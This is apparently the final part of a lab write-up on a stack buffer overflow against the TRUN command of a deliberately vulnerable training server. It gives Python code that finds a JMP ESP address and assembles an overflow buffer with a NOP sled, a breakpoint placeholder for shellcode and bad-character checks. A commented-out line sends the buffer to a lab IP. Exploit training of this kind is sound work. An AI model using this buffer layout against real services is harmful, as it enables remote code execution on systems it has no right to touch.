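Three checks worth automating before firing the final script, as an added example (Python 3, not the page's final script and not mona's code): locating JMP ESP (FF E4) in a module image the way `!mona find -s "\xff\xe4"` does, packing the address little-endian, and assembling offset + return address + NOP sled + shellcode while refusing to send if a bad character or a length problem is present. The offset, address and bad character are the values from this write-up; `MODULE_IMAGE` is a constructed stand-in for essfunc.dll with one JMP ESP planted at the right offset, and `DEBUG_PAYLOAD` is a block of INT3 (0xCC) breakpoints to stand in for msfvenom output.

```python
# Exploit assembly checks (Python 3). Added example; values from the write-up.
import struct

OFFSET = 2003                       # EIP offset (Part 1)
JMP_ESP = 0x625011AF                # JMP ESP in essfunc.dll (Part 3)
BAD_CHARS = {0x00}                  # bad characters (Part 2)

# Constructed stand-in for a loaded module: NOP-filled blob with one JMP ESP
# (FF E4) planted at offset 0x11AF. essfunc.dll's real image base is
# 0x62500000, which is what makes the hit come out at 0x625011AF.
MODULE_BASE = 0x62500000
MODULE_IMAGE = bytearray(b"\x90" * 0x2000)
MODULE_IMAGE[0x11AF:0x11B1] = b"\xff\xe4"


def find_jmp_esp(image, base):
    """Return every virtual address in `image` that holds FF E4 (JMP ESP)."""
    hits, start = [], 0
    while True:
        i = image.find(b"\xff\xe4", start)
        if i < 0:
            return hits
        hits.append(base + i)
        start = i + 1


def pack_ret(addr):
    """Little-endian 32-bit: 0x625011AF -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


def build_exploit(shellcode, ret=JMP_ESP, nops=20, bad=BAD_CHARS, room=3000):
    """Assemble the TRUN buffer. Raises ValueError if the return address or
    the shellcode contains a bad character, or if the buffer is longer than
    the input size the crash test showed we control."""
    ret_bytes = pack_ret(ret)
    for name, blob in (("return address", ret_bytes), ("shellcode", shellcode)):
        hit = next((b for b in blob if b in bad), None)
        if hit is not None:
            raise ValueError("%s contains bad char 0x%02x" % (name, hit))
    buf = b"A" * OFFSET + ret_bytes + b"\x90" * nops + shellcode
    if len(buf) > room:
        raise ValueError("buffer is %d bytes, more than the %d tested" % (len(buf), room))
    return buf


# INT3 stand-in for msfvenom output: send this first and the debugger should
# break at ESP + 20, proving the jump lands; then swap in the real shellcode.
DEBUG_PAYLOAD = b"\xcc" * 351


if __name__ == "__main__":
    print([hex(a) for a in find_jmp_esp(MODULE_IMAGE, MODULE_BASE)])
    buf = build_exploit(DEBUG_PAYLOAD)
    print(len(buf), buf[OFFSET:OFFSET + 4])
    # To fire: socket.create_connection(("10.0.0.36", 9999)).sendall(b"TRUN /.:/" + buf)
```

The INT3 run is a cheap confirmation that the return address, sled and layout are right before a real payload muddies the picture: a break at the first 0xCC means the bytes after the sled execute as code.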

THANK YOU. Clap if you liked it; feedback is welcome 👍


Written by Raj Singh, Security Researcher, Product Security Engineer
